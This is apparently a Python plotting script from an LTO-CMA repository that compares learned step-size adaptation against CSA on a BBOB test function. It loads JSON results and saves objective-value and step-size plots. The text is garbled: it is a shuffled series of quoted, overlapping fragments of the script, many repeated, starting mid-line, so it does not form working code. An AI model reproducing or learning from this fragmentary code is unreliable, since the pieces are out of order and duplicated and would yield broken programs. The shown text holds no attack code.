LTO\"]) + 1)), np.subtract(data_LTO[\"Average costs LTO\"], data_LTO[\"Std costs LTO\"]), np.add(data_LTO[\"Average costs LTO\"],", "= 0.5 rcParams['axes.linewidth'] = 3 rcParams['axes.edgecolor'] = 'k' rcParams['axes.grid.which'] = 'both' rcParams['legend.frameon'] =", "LTO data file.\", default=os.path.join(\"..\",\"examples\",\"10BBOB\",\"GallaghersGaussian21hi_LTO.json\")) parser.add_argument('--csa_path', type=dir_path, help=\"Path to the CSA data file.\", default=os.path.join(\"..\",\"data\",\"PPSN_LTO_Data\",\"CSA_Data\",\"CSA_Plots_10D\",\"GallaghersGaussian21hi.json\"))", "Sigma CSA\"]), color=sns.xkcd_rgb[\"green\"], alpha=0.1) plt.plot(list(np.arange(1, len(data_CSA[\"Sigma CSA\"]) + 1)), data_CSA[\"Sigma CSA\"], linewidth=4, label=\"CSA\",", "popsize = 10 data_LTO = {} data_CSA = {} with open(lto_path) as json_file:", "= 'True' rcParams['legend.framealpha'] = 1 rcParams['legend.fontsize'] = 30 rcParams['ytick.major.size'] = 32 rcParams['ytick.major.width'] =", "plot_file), bbox_inches='tight') plt.clf() plt.tick_params(axis='x', which='minor') plt.legend(loc=0, fontsize=25, ncol=2) plt.xlabel(\"Num FEval\", fontsize=50) plt.ylabel(\"Objective Value\",", "type = \"StepSize\" output_path = os.path.join(\"..\",\"plots\") os.makedirs(output_path, exist_ok=True) timestamp = datetime.now() time =", "which='minor') plt.legend(loc=0, fontsize=25, ncol=2) plt.xlabel(\"Num FEval\", fontsize=50) plt.ylabel(\"Step Size\", fontsize=50) plt.xticks(np.arange(start=1, stop=generations, step=generations//5),", "exist_ok=True) timestamp = datetime.now() time = str(timestamp) plot_file = ('Plot_%s_%s_%s.pdf' % (type, function,", "LTO\"]), np.add(data_LTO[\"Average costs LTO\"], data_LTO[\"Std costs LTO\"]), alpha=0.1, color=sns.xkcd_rgb[\"magenta\"]) plt.plot(list(np.arange(1, len(data_LTO[\"Average costs LTO\"])", "costs CSA\"], linewidth=4, label=\"CSA\", color=sns.xkcd_rgb[\"green\"]) plt.legend() type = \"ObjectiveValue\" timestamp = datetime.now() time", 
"rcParams['legend.frameon'] = 'True' rcParams['legend.framealpha'] = 1 rcParams['legend.fontsize'] = 30 rcParams['ytick.major.size'] = 32 rcParams['ytick.major.width']", "if os.path.isfile(path): return path else: raise argparse.ArgumentTypeError(\"readable_dir:%s is not a valid path to", "= 32 rcParams['ytick.major.width'] = 6 rcParams['ytick.minor.size'] = 6 rcParams['ytick.minor.width'] = 1 rcParams['xtick.major.size'] =", "'k' rcParams['axes.grid.which'] = 'both' rcParams['legend.frameon'] = 'True' rcParams['legend.framealpha'] = 1 rcParams['legend.fontsize'] = 30", "CSA\"], linewidth=4, label=\"CSA\", color=sns.xkcd_rgb[\"green\"]) plt.legend() type = \"ObjectiveValue\" timestamp = datetime.now() time =", "plt.xticks(np.arange(start=1, stop=generations, step=generations//5), [str(10)] + [str(gen * 10) for gen in np.arange(start=10, stop=generations,", "+ 1)), data_LTO[\"Sigma LTO\"], linewidth=4, label=\"LTO\", color=sns.xkcd_rgb[\"magenta\"]) plt.fill_between(list(np.arange(1, len(data_CSA[\"Sigma CSA\"]) + 1)), np.subtract(data_CSA[\"Sigma", "= 'k' rcParams['axes.grid.which'] = 'both' rcParams['legend.frameon'] = 'True' rcParams['legend.framealpha'] = 1 rcParams['legend.fontsize'] =", "for gen in np.arange(start=10, stop=generations, step=generations//5)]) plt.fill_between(list(np.arange(1, len(data_LTO[\"Average costs LTO\"]) + 1)), np.subtract(data_LTO[\"Average", "label=\"LTO\", color=sns.xkcd_rgb[\"magenta\"]) plt.fill_between(list(np.arange(1, len(data_CSA[\"Sigma CSA\"]) + 1)), np.subtract(data_CSA[\"Sigma CSA\"], data_CSA[\"Std Sigma CSA\"]), np.add(data_CSA[\"Sigma", "linewidth=4, label=\"LTO\", color=sns.xkcd_rgb[\"magenta\"]) plt.fill_between(list(np.arange(1, len(data_CSA[\"Average costs CSA\"]) + 1)), np.subtract(data_CSA[\"Average costs CSA\"], data_CSA[\"Std", "os.path.join(\"..\",\"plots\") os.makedirs(output_path, exist_ok=True) timestamp = datetime.now() time = str(timestamp) plot_file = ('Plot_%s_%s_%s.pdf' %", "LTO\"]) + 1)), 
np.subtract(data_LTO[\"Sigma LTO\"], data_LTO[\"Std Sigma LTO\"]), np.add(data_LTO[\"Sigma LTO\"], data_LTO[\"Std Sigma LTO\"]),", "len(data_LTO[\"Sigma LTO\"]) + 1)), data_LTO[\"Sigma LTO\"], linewidth=4, label=\"LTO\", color=sns.xkcd_rgb[\"magenta\"]) plt.fill_between(list(np.arange(1, len(data_CSA[\"Sigma CSA\"]) +", "= True rcParams['figure.edgecolor'] = 'k' rcParams['grid.color'] = 'k' rcParams['grid.linestyle'] = ':' rcParams['grid.linewidth'] =", "('Plot_%s_%s_%s.pdf' % (type, function, time)) plt.savefig(os.path.join(output_path, plot_file), bbox_inches='tight') plt.clf() plt.tick_params(axis='x', which='minor') plt.legend(loc=0, fontsize=25,", "6 rcParams['xtick.minor.size'] = 6 rcParams['xtick.minor.width'] = 1 rcParams['xtick.labelsize'] = 32 rcParams['ytick.labelsize'] = 32", "plt.plot(list(np.arange(1, len(data_LTO[\"Average costs LTO\"]) + 1)), data_LTO[\"Average costs LTO\"], linewidth=4, label=\"LTO\", color=sns.xkcd_rgb[\"magenta\"]) plt.fill_between(list(np.arange(1,", "matplotlib import rcParams rcParams[\"font.size\"] = \"40\" rcParams['text.usetex'] = False rcParams['font.family'] = 'serif' rcParams['figure.figsize']", "bbox_inches='tight') plt.clf() plt.tick_params(axis='x', which='minor') plt.legend(loc=0, fontsize=25, ncol=2) plt.xlabel(\"Num FEval\", fontsize=50) plt.ylabel(\"Objective Value\", fontsize=50)", "with open(lto_path) as json_file: data_LTO = json.load(json_file) with open(csa_path) as json_file: data_CSA =", "is not a valid path to a file\"% path) parser = argparse.ArgumentParser(description='Script to", "parser = argparse.ArgumentParser(description='Script to plot LTO test data.') parser.add_argument('--lto_path', type=dir_path, help=\"Path to the", "data_CSA = json.load(json_file) generations = len(data_LTO[\"Average costs LTO\"]) num_feval = generations * popsize", "costs LTO\"]) + 1)), data_LTO[\"Average costs LTO\"], linewidth=4, label=\"LTO\", color=sns.xkcd_rgb[\"magenta\"]) plt.fill_between(list(np.arange(1, 
len(data_CSA[\"Average costs", "np.arange(start=10, stop=generations, step=generations//5)]) plt.fill_between(list(np.arange(1, len(data_LTO[\"Average costs LTO\"]) + 1)), np.subtract(data_LTO[\"Average costs LTO\"], data_LTO[\"Std", "return path else: raise argparse.ArgumentTypeError(\"readable_dir:%s is not a valid path to a file\"%", "data_LTO[\"Std costs LTO\"]), np.add(data_LTO[\"Average costs LTO\"], data_LTO[\"Std costs LTO\"]), alpha=0.1, color=sns.xkcd_rgb[\"magenta\"]) plt.plot(list(np.arange(1, len(data_LTO[\"Average", "color=sns.xkcd_rgb[\"magenta\"]) plt.plot(list(np.arange(1, len(data_LTO[\"Average costs LTO\"]) + 1)), data_LTO[\"Average costs LTO\"], linewidth=4, label=\"LTO\", color=sns.xkcd_rgb[\"magenta\"])", "(type, function, time)) plt.savefig(os.path.join(output_path, plot_file), bbox_inches='tight') plt.clf() plt.tick_params(axis='x', which='minor') plt.legend(loc=0, fontsize=25, ncol=2) plt.xlabel(\"Num", "fontsize=50) plt.ylabel(\"Step Size\", fontsize=50) plt.xticks(np.arange(start=1, stop=generations, step=generations//5), [str(10)] + [str(gen * 10) for", "data_CSA[\"Sigma CSA\"], linewidth=4, label=\"CSA\", color=sns.xkcd_rgb[\"green\"]) plt.legend() type = \"StepSize\" output_path = os.path.join(\"..\",\"plots\") os.makedirs(output_path,", "seaborn as sns import matplotlib.pyplot as plt import argparse from datetime import datetime", "[str(10)] + [str(gen * 10) for gen in np.arange(start=10, stop=generations, step=generations//5)]) plt.xticks() plt.title(function)", "32 rcParams['ytick.major.width'] = 6 rcParams['ytick.minor.size'] = 6 rcParams['ytick.minor.width'] = 1 rcParams['xtick.major.size'] = 32", "import datetime sns.set() from matplotlib import rcParams rcParams[\"font.size\"] = \"40\" rcParams['text.usetex'] = False", "dir_path(path): if os.path.isfile(path): return path else: raise argparse.ArgumentTypeError(\"readable_dir:%s is not a valid path", "file.\", 
default=os.path.join(\"..\",\"data\",\"PPSN_LTO_Data\",\"CSA_Data\",\"CSA_Plots_10D\",\"GallaghersGaussian21hi.json\")) parser.add_argument('--function', type=str, help=\"Function being plotted\", default=\"GallaghersGaussian21hi\") args = parser.parse_args() lto_path =", "args = parser.parse_args() lto_path = args.lto_path csa_path = args.csa_path function = args.function popsize", "plt.tick_params(axis='x', which='minor') plt.legend(loc=0, fontsize=25, ncol=2) plt.xlabel(\"Num FEval\", fontsize=50) plt.ylabel(\"Step Size\", fontsize=50) plt.xticks(np.arange(start=1, stop=generations,", "as json_file: data_CSA = json.load(json_file) generations = len(data_LTO[\"Average costs LTO\"]) num_feval = generations", "= ('Plot_%s_%s_%s.pdf' % (type, function, time)) plt.savefig(os.path.join(output_path, plot_file), bbox_inches='tight') plt.clf() plt.tick_params(axis='x', which='minor') plt.legend(loc=0,", "10 data_LTO = {} data_CSA = {} with open(lto_path) as json_file: data_LTO =", "32 def dir_path(path): if os.path.isfile(path): return path else: raise argparse.ArgumentTypeError(\"readable_dir:%s is not a", "1 rcParams['legend.fontsize'] = 30 rcParams['ytick.major.size'] = 32 rcParams['ytick.major.width'] = 6 rcParams['ytick.minor.size'] = 6", "plt.plot(list(np.arange(1, len(data_LTO[\"Sigma LTO\"]) + 1)), data_LTO[\"Sigma LTO\"], linewidth=4, label=\"LTO\", color=sns.xkcd_rgb[\"magenta\"]) plt.fill_between(list(np.arange(1, len(data_CSA[\"Sigma CSA\"])", "LTO\"], linewidth=4, label=\"LTO\", color=sns.xkcd_rgb[\"magenta\"]) plt.fill_between(list(np.arange(1, len(data_CSA[\"Sigma CSA\"]) + 1)), np.subtract(data_CSA[\"Sigma CSA\"], data_CSA[\"Std Sigma", "def dir_path(path): if os.path.isfile(path): return path else: raise argparse.ArgumentTypeError(\"readable_dir:%s is not a valid", "json_file: data_LTO = json.load(json_file) with open(csa_path) as json_file: data_CSA = json.load(json_file) generations =", "= \"StepSize\" output_path = os.path.join(\"..\",\"plots\") 
os.makedirs(output_path, exist_ok=True) timestamp = datetime.now() time = str(timestamp)", "not a valid path to a file\"% path) parser = argparse.ArgumentParser(description='Script to plot", "':' rcParams['grid.linewidth'] = 0.5 rcParams['axes.linewidth'] = 3 rcParams['axes.edgecolor'] = 'k' rcParams['axes.grid.which'] = 'both'", "default=os.path.join(\"..\",\"examples\",\"10BBOB\",\"GallaghersGaussian21hi_LTO.json\")) parser.add_argument('--csa_path', type=dir_path, help=\"Path to the CSA data file.\", default=os.path.join(\"..\",\"data\",\"PPSN_LTO_Data\",\"CSA_Data\",\"CSA_Plots_10D\",\"GallaghersGaussian21hi.json\")) parser.add_argument('--function', type=str, help=\"Function", "costs LTO\"], linewidth=4, label=\"LTO\", color=sns.xkcd_rgb[\"magenta\"]) plt.fill_between(list(np.arange(1, len(data_CSA[\"Average costs CSA\"]) + 1)), np.subtract(data_CSA[\"Average costs", "plt.clf() plt.tick_params(axis='x', which='minor') plt.legend(loc=0, fontsize=25, ncol=2) plt.xlabel(\"Num FEval\", fontsize=50) plt.ylabel(\"Objective Value\", fontsize=50) plt.xscale(\"log\")", "color=sns.xkcd_rgb[\"green\"]) plt.plot(list(np.arange(1, len(data_CSA[\"Average costs CSA\"]) + 1)), data_CSA[\"Average costs CSA\"], linewidth=4, label=\"CSA\", color=sns.xkcd_rgb[\"green\"])", "as np import seaborn as sns import matplotlib.pyplot as plt import argparse from", "= 32 rcParams['ytick.labelsize'] = 32 def dir_path(path): if os.path.isfile(path): return path else: raise", "stop=generations, step=generations//5), [str(10)] + [str(gen * 10) for gen in np.arange(start=10, stop=generations, step=generations//5)])", "CSA\"], data_CSA[\"Std costs CSA\"]), alpha=0.1, color=sns.xkcd_rgb[\"green\"]) plt.plot(list(np.arange(1, len(data_CSA[\"Average costs CSA\"]) + 1)), data_CSA[\"Average", "1)), data_LTO[\"Average costs LTO\"], linewidth=4, label=\"LTO\", color=sns.xkcd_rgb[\"magenta\"]) plt.fill_between(list(np.arange(1, len(data_CSA[\"Average costs CSA\"]) + 1)),", "data_LTO[\"Std Sigma LTO\"]), 
color=sns.xkcd_rgb[\"magenta\"], alpha=0.1) plt.plot(list(np.arange(1, len(data_LTO[\"Sigma LTO\"]) + 1)), data_LTO[\"Sigma LTO\"], linewidth=4,", "as json_file: data_LTO = json.load(json_file) with open(csa_path) as json_file: data_CSA = json.load(json_file) generations", "plt.plot(list(np.arange(1, len(data_CSA[\"Sigma CSA\"]) + 1)), data_CSA[\"Sigma CSA\"], linewidth=4, label=\"CSA\", color=sns.xkcd_rgb[\"green\"]) plt.legend() type =", "popsize plt.tick_params(axis='x', which='minor') plt.legend(loc=0, fontsize=25, ncol=2) plt.xlabel(\"Num FEval\", fontsize=50) plt.ylabel(\"Step Size\", fontsize=50) plt.xticks(np.arange(start=1,", "costs CSA\"]), alpha=0.1, color=sns.xkcd_rgb[\"green\"]) plt.plot(list(np.arange(1, len(data_CSA[\"Average costs CSA\"]) + 1)), data_CSA[\"Average costs CSA\"],", "plt.fill_between(list(np.arange(1, len(data_LTO[\"Average costs LTO\"]) + 1)), np.subtract(data_LTO[\"Average costs LTO\"], data_LTO[\"Std costs LTO\"]), np.add(data_LTO[\"Average", "default=\"GallaghersGaussian21hi\") args = parser.parse_args() lto_path = args.lto_path csa_path = args.csa_path function = args.function", "= args.lto_path csa_path = args.csa_path function = args.function popsize = 10 data_LTO =", "costs CSA\"]) + 1)), data_CSA[\"Average costs CSA\"], linewidth=4, label=\"CSA\", color=sns.xkcd_rgb[\"green\"]) plt.legend() type =", "6 rcParams['ytick.minor.size'] = 6 rcParams['ytick.minor.width'] = 1 rcParams['xtick.major.size'] = 32 rcParams['xtick.major.width'] = 6", "= str(timestamp) plot_file = ('Plot_%s_%s_%s.pdf' % (type, function, time)) plt.savefig(os.path.join(output_path, plot_file), bbox_inches='tight') plt.clf()", "data_LTO[\"Average costs LTO\"], linewidth=4, label=\"LTO\", color=sns.xkcd_rgb[\"magenta\"]) plt.fill_between(list(np.arange(1, len(data_CSA[\"Average costs CSA\"]) + 1)), np.subtract(data_CSA[\"Average", "plot LTO test data.') parser.add_argument('--lto_path', type=dir_path, help=\"Path to the LTO data file.\", 
default=os.path.join(\"..\",\"examples\",\"10BBOB\",\"GallaghersGaussian21hi_LTO.json\"))", "plt import argparse from datetime import datetime sns.set() from matplotlib import rcParams rcParams[\"font.size\"]", "'k' rcParams['grid.color'] = 'k' rcParams['grid.linestyle'] = ':' rcParams['grid.linewidth'] = 0.5 rcParams['axes.linewidth'] = 3", "= os.path.join(\"..\",\"plots\") os.makedirs(output_path, exist_ok=True) timestamp = datetime.now() time = str(timestamp) plot_file = ('Plot_%s_%s_%s.pdf'", "+ 1)), data_LTO[\"Average costs LTO\"], linewidth=4, label=\"LTO\", color=sns.xkcd_rgb[\"magenta\"]) plt.fill_between(list(np.arange(1, len(data_CSA[\"Average costs CSA\"]) +", "= {} with open(lto_path) as json_file: data_LTO = json.load(json_file) with open(csa_path) as json_file:", "32 rcParams['xtick.major.width'] = 6 rcParams['xtick.minor.size'] = 6 rcParams['xtick.minor.width'] = 1 rcParams['xtick.labelsize'] = 32", "= argparse.ArgumentParser(description='Script to plot LTO test data.') parser.add_argument('--lto_path', type=dir_path, help=\"Path to the LTO", "* popsize plt.tick_params(axis='x', which='minor') plt.legend(loc=0, fontsize=25, ncol=2) plt.xlabel(\"Num FEval\", fontsize=50) plt.ylabel(\"Step Size\", fontsize=50)", "gen in np.arange(start=10, stop=generations, step=generations//5)]) plt.xticks() plt.title(function) plt.fill_between(list(np.arange(1, len(data_LTO[\"Sigma LTO\"]) + 1)), np.subtract(data_LTO[\"Sigma", "import numpy as np import seaborn as sns import matplotlib.pyplot as plt import", "help=\"Path to the CSA data file.\", default=os.path.join(\"..\",\"data\",\"PPSN_LTO_Data\",\"CSA_Data\",\"CSA_Plots_10D\",\"GallaghersGaussian21hi.json\")) parser.add_argument('--function', type=str, help=\"Function being plotted\", default=\"GallaghersGaussian21hi\")", "rcParams['figure.frameon'] = True rcParams['figure.edgecolor'] = 'k' rcParams['grid.color'] = 'k' rcParams['grid.linestyle'] = ':' rcParams['grid.linewidth']", "CSA\"]), np.add(data_CSA[\"Sigma 
CSA\"], data_CSA[\"Std Sigma CSA\"]), color=sns.xkcd_rgb[\"green\"], alpha=0.1) plt.plot(list(np.arange(1, len(data_CSA[\"Sigma CSA\"]) + 1)),", "for gen in np.arange(start=10, stop=generations, step=generations//5)]) plt.xticks() plt.title(function) plt.fill_between(list(np.arange(1, len(data_LTO[\"Sigma LTO\"]) + 1)),", "label=\"CSA\", color=sns.xkcd_rgb[\"green\"]) plt.legend() type = \"ObjectiveValue\" timestamp = datetime.now() time = str(timestamp) plot_file", "color=sns.xkcd_rgb[\"green\"]) plt.legend() type = \"ObjectiveValue\" timestamp = datetime.now() time = str(timestamp) plot_file =", "from datetime import datetime sns.set() from matplotlib import rcParams rcParams[\"font.size\"] = \"40\" rcParams['text.usetex']", "= 6 rcParams['ytick.minor.width'] = 1 rcParams['xtick.major.size'] = 32 rcParams['xtick.major.width'] = 6 rcParams['xtick.minor.size'] =", "step=generations//5)]) plt.fill_between(list(np.arange(1, len(data_LTO[\"Average costs LTO\"]) + 1)), np.subtract(data_LTO[\"Average costs LTO\"], data_LTO[\"Std costs LTO\"]),", "args.csa_path function = args.function popsize = 10 data_LTO = {} data_CSA = {}", "LTO\"]), np.add(data_LTO[\"Sigma LTO\"], data_LTO[\"Std Sigma LTO\"]), color=sns.xkcd_rgb[\"magenta\"], alpha=0.1) plt.plot(list(np.arange(1, len(data_LTO[\"Sigma LTO\"]) + 1)),", "LTO\"]) + 1)), np.subtract(data_LTO[\"Average costs LTO\"], data_LTO[\"Std costs LTO\"]), np.add(data_LTO[\"Average costs LTO\"], data_LTO[\"Std", "path to a file\"% path) parser = argparse.ArgumentParser(description='Script to plot LTO test data.')", "= 1 rcParams['legend.fontsize'] = 30 rcParams['ytick.major.size'] = 32 rcParams['ytick.major.width'] = 6 rcParams['ytick.minor.size'] =", "plt.ylabel(\"Step Size\", fontsize=50) plt.xticks(np.arange(start=1, stop=generations, step=generations//5), [str(10)] + [str(gen * 10) for gen", "file.\", default=os.path.join(\"..\",\"examples\",\"10BBOB\",\"GallaghersGaussian21hi_LTO.json\")) parser.add_argument('--csa_path', 
type=dir_path, help=\"Path to the CSA data file.\", default=os.path.join(\"..\",\"data\",\"PPSN_LTO_Data\",\"CSA_Data\",\"CSA_Plots_10D\",\"GallaghersGaussian21hi.json\")) parser.add_argument('--function', type=str,", "raise argparse.ArgumentTypeError(\"readable_dir:%s is not a valid path to a file\"% path) parser =", "type=str, help=\"Function being plotted\", default=\"GallaghersGaussian21hi\") args = parser.parse_args() lto_path = args.lto_path csa_path =", "test data.') parser.add_argument('--lto_path', type=dir_path, help=\"Path to the LTO data file.\", default=os.path.join(\"..\",\"examples\",\"10BBOB\",\"GallaghersGaussian21hi_LTO.json\")) parser.add_argument('--csa_path', type=dir_path,", "argparse from datetime import datetime sns.set() from matplotlib import rcParams rcParams[\"font.size\"] = \"40\"", "rcParams['grid.linestyle'] = ':' rcParams['grid.linewidth'] = 0.5 rcParams['axes.linewidth'] = 3 rcParams['axes.edgecolor'] = 'k' rcParams['axes.grid.which']", "plt.title(function) plt.xticks(np.arange(start=1, stop=generations, step=generations//5), [str(10)] + [str(gen * 10) for gen in np.arange(start=10,", "rcParams[\"font.size\"] = \"40\" rcParams['text.usetex'] = False rcParams['font.family'] = 'serif' rcParams['figure.figsize'] = (16.0, 9.0)", "1 rcParams['xtick.labelsize'] = 32 rcParams['ytick.labelsize'] = 32 def dir_path(path): if os.path.isfile(path): return path", "output_path = os.path.join(\"..\",\"plots\") os.makedirs(output_path, exist_ok=True) timestamp = datetime.now() time = str(timestamp) plot_file =", "from matplotlib import rcParams rcParams[\"font.size\"] = \"40\" rcParams['text.usetex'] = False rcParams['font.family'] = 'serif'", "alpha=0.1, color=sns.xkcd_rgb[\"green\"]) plt.plot(list(np.arange(1, len(data_CSA[\"Average costs CSA\"]) + 1)), data_CSA[\"Average costs CSA\"], linewidth=4, label=\"CSA\",", "data_LTO = {} data_CSA = {} with open(lto_path) as json_file: data_LTO = json.load(json_file)", "= 30 rcParams['ytick.major.size'] = 
32 rcParams['ytick.major.width'] = 6 rcParams['ytick.minor.size'] = 6 rcParams['ytick.minor.width'] =", "= ':' rcParams['grid.linewidth'] = 0.5 rcParams['axes.linewidth'] = 3 rcParams['axes.edgecolor'] = 'k' rcParams['axes.grid.which'] =", "costs CSA\"]), np.add(data_CSA[\"Average costs CSA\"], data_CSA[\"Std costs CSA\"]), alpha=0.1, color=sns.xkcd_rgb[\"green\"]) plt.plot(list(np.arange(1, len(data_CSA[\"Average costs", "rcParams['legend.fontsize'] = 30 rcParams['ytick.major.size'] = 32 rcParams['ytick.major.width'] = 6 rcParams['ytick.minor.size'] = 6 rcParams['ytick.minor.width']", "fontsize=25, ncol=2) plt.xlabel(\"Num FEval\", fontsize=50) plt.ylabel(\"Step Size\", fontsize=50) plt.xticks(np.arange(start=1, stop=generations, step=generations//5), [str(10)] +", "= 1 rcParams['xtick.major.size'] = 32 rcParams['xtick.major.width'] = 6 rcParams['xtick.minor.size'] = 6 rcParams['xtick.minor.width'] =", "rcParams['legend.framealpha'] = 1 rcParams['legend.fontsize'] = 30 rcParams['ytick.major.size'] = 32 rcParams['ytick.major.width'] = 6 rcParams['ytick.minor.size']", "parser.add_argument('--csa_path', type=dir_path, help=\"Path to the CSA data file.\", default=os.path.join(\"..\",\"data\",\"PPSN_LTO_Data\",\"CSA_Data\",\"CSA_Plots_10D\",\"GallaghersGaussian21hi.json\")) parser.add_argument('--function', type=str, help=\"Function being", "rcParams['axes.edgecolor'] = 'k' rcParams['axes.grid.which'] = 'both' rcParams['legend.frameon'] = 'True' rcParams['legend.framealpha'] = 1 rcParams['legend.fontsize']", "sns import matplotlib.pyplot as plt import argparse from datetime import datetime sns.set() from", "<reponame>shercklo/LTO-CMA import os import json import numpy as np import seaborn as sns", "to plot LTO test data.') parser.add_argument('--lto_path', type=dir_path, help=\"Path to the LTO data file.\",", "'k' rcParams['grid.linestyle'] = ':' rcParams['grid.linewidth'] = 0.5 rcParams['axes.linewidth'] = 3 rcParams['axes.edgecolor'] = 'k'", "file\"% path) parser = 
argparse.ArgumentParser(description='Script to plot LTO test data.') parser.add_argument('--lto_path', type=dir_path, help=\"Path", "LTO\"]) + 1)), data_LTO[\"Sigma LTO\"], linewidth=4, label=\"LTO\", color=sns.xkcd_rgb[\"magenta\"]) plt.fill_between(list(np.arange(1, len(data_CSA[\"Sigma CSA\"]) + 1)),", "np.arange(start=10, stop=generations, step=generations//5)]) plt.xticks() plt.title(function) plt.fill_between(list(np.arange(1, len(data_LTO[\"Sigma LTO\"]) + 1)), np.subtract(data_LTO[\"Sigma LTO\"], data_LTO[\"Std", "function, time)) plt.savefig(os.path.join(output_path, plot_file), bbox_inches='tight') plt.clf() plt.tick_params(axis='x', which='minor') plt.legend(loc=0, fontsize=25, ncol=2) plt.xlabel(\"Num FEval\",", "= (16.0, 9.0) rcParams['figure.frameon'] = True rcParams['figure.edgecolor'] = 'k' rcParams['grid.color'] = 'k' rcParams['grid.linestyle']", "parser.parse_args() lto_path = args.lto_path csa_path = args.csa_path function = args.function popsize = 10", "= 6 rcParams['ytick.minor.size'] = 6 rcParams['ytick.minor.width'] = 1 rcParams['xtick.major.size'] = 32 rcParams['xtick.major.width'] =", "LTO\"]), alpha=0.1, color=sns.xkcd_rgb[\"magenta\"]) plt.plot(list(np.arange(1, len(data_LTO[\"Average costs LTO\"]) + 1)), data_LTO[\"Average costs LTO\"], linewidth=4,", "6 rcParams['xtick.minor.width'] = 1 rcParams['xtick.labelsize'] = 32 rcParams['ytick.labelsize'] = 32 def dir_path(path): if", "with open(csa_path) as json_file: data_CSA = json.load(json_file) generations = len(data_LTO[\"Average costs LTO\"]) num_feval", "type=dir_path, help=\"Path to the LTO data file.\", default=os.path.join(\"..\",\"examples\",\"10BBOB\",\"GallaghersGaussian21hi_LTO.json\")) parser.add_argument('--csa_path', type=dir_path, help=\"Path to the", "help=\"Path to the LTO data file.\", default=os.path.join(\"..\",\"examples\",\"10BBOB\",\"GallaghersGaussian21hi_LTO.json\")) parser.add_argument('--csa_path', type=dir_path, help=\"Path to the CSA", "np.add(data_LTO[\"Average 
costs LTO\"], data_LTO[\"Std costs LTO\"]), alpha=0.1, color=sns.xkcd_rgb[\"magenta\"]) plt.plot(list(np.arange(1, len(data_LTO[\"Average costs LTO\"]) +", "rcParams['ytick.labelsize'] = 32 def dir_path(path): if os.path.isfile(path): return path else: raise argparse.ArgumentTypeError(\"readable_dir:%s is", "Sigma CSA\"]), np.add(data_CSA[\"Sigma CSA\"], data_CSA[\"Std Sigma CSA\"]), color=sns.xkcd_rgb[\"green\"], alpha=0.1) plt.plot(list(np.arange(1, len(data_CSA[\"Sigma CSA\"]) +", "rcParams['axes.linewidth'] = 3 rcParams['axes.edgecolor'] = 'k' rcParams['axes.grid.which'] = 'both' rcParams['legend.frameon'] = 'True' rcParams['legend.framealpha']", "ncol=2) plt.xlabel(\"Num FEval\", fontsize=50) plt.ylabel(\"Objective Value\", fontsize=50) plt.xscale(\"log\") plt.title(function) plt.xticks(np.arange(start=1, stop=generations, step=generations//5), [str(10)]", "else: raise argparse.ArgumentTypeError(\"readable_dir:%s is not a valid path to a file\"% path) parser", "alpha=0.1) plt.plot(list(np.arange(1, len(data_LTO[\"Sigma LTO\"]) + 1)), data_LTO[\"Sigma LTO\"], linewidth=4, label=\"LTO\", color=sns.xkcd_rgb[\"magenta\"]) plt.fill_between(list(np.arange(1, len(data_CSA[\"Sigma", "= \"ObjectiveValue\" timestamp = datetime.now() time = str(timestamp) plot_file = ('Plot_%s_%s_%s.pdf' % (type,", "being plotted\", default=\"GallaghersGaussian21hi\") args = parser.parse_args() lto_path = args.lto_path csa_path = args.csa_path function", "import os import json import numpy as np import seaborn as sns import", "+ [str(gen * 10) for gen in np.arange(start=10, stop=generations, step=generations//5)]) plt.fill_between(list(np.arange(1, len(data_LTO[\"Average costs", "10) for gen in np.arange(start=10, stop=generations, step=generations//5)]) plt.fill_between(list(np.arange(1, len(data_LTO[\"Average costs LTO\"]) + 1)),", "rcParams['font.family'] = 'serif' rcParams['figure.figsize'] = (16.0, 9.0) rcParams['figure.frameon'] = True rcParams['figure.edgecolor'] = 'k'", 
"rcParams['text.usetex'] = False rcParams['font.family'] = 'serif' rcParams['figure.figsize'] = (16.0, 9.0) rcParams['figure.frameon'] = True", "help=\"Function being plotted\", default=\"GallaghersGaussian21hi\") args = parser.parse_args() lto_path = args.lto_path csa_path = args.csa_path", "False rcParams['font.family'] = 'serif' rcParams['figure.figsize'] = (16.0, 9.0) rcParams['figure.frameon'] = True rcParams['figure.edgecolor'] =", "rcParams['ytick.minor.size'] = 6 rcParams['ytick.minor.width'] = 1 rcParams['xtick.major.size'] = 32 rcParams['xtick.major.width'] = 6 rcParams['xtick.minor.size']", "data.') parser.add_argument('--lto_path', type=dir_path, help=\"Path to the LTO data file.\", default=os.path.join(\"..\",\"examples\",\"10BBOB\",\"GallaghersGaussian21hi_LTO.json\")) parser.add_argument('--csa_path', type=dir_path, help=\"Path", "lto_path = args.lto_path csa_path = args.csa_path function = args.function popsize = 10 data_LTO", "+ 1)), np.subtract(data_CSA[\"Average costs CSA\"], data_CSA[\"Std costs CSA\"]), np.add(data_CSA[\"Average costs CSA\"], data_CSA[\"Std costs", "Value\", fontsize=50) plt.xscale(\"log\") plt.title(function) plt.xticks(np.arange(start=1, stop=generations, step=generations//5), [str(10)] + [str(gen * 10) for", "plt.title(function) plt.fill_between(list(np.arange(1, len(data_LTO[\"Sigma LTO\"]) + 1)), np.subtract(data_LTO[\"Sigma LTO\"], data_LTO[\"Std Sigma LTO\"]), np.add(data_LTO[\"Sigma LTO\"],", "path else: raise argparse.ArgumentTypeError(\"readable_dir:%s is not a valid path to a file\"% path)", "data_CSA[\"Std Sigma CSA\"]), color=sns.xkcd_rgb[\"green\"], alpha=0.1) plt.plot(list(np.arange(1, len(data_CSA[\"Sigma CSA\"]) + 1)), data_CSA[\"Sigma CSA\"], linewidth=4,", "\"StepSize\" output_path = os.path.join(\"..\",\"plots\") os.makedirs(output_path, exist_ok=True) timestamp = datetime.now() time = str(timestamp) plot_file", "plt.fill_between(list(np.arange(1, len(data_CSA[\"Sigma CSA\"]) + 1)), 
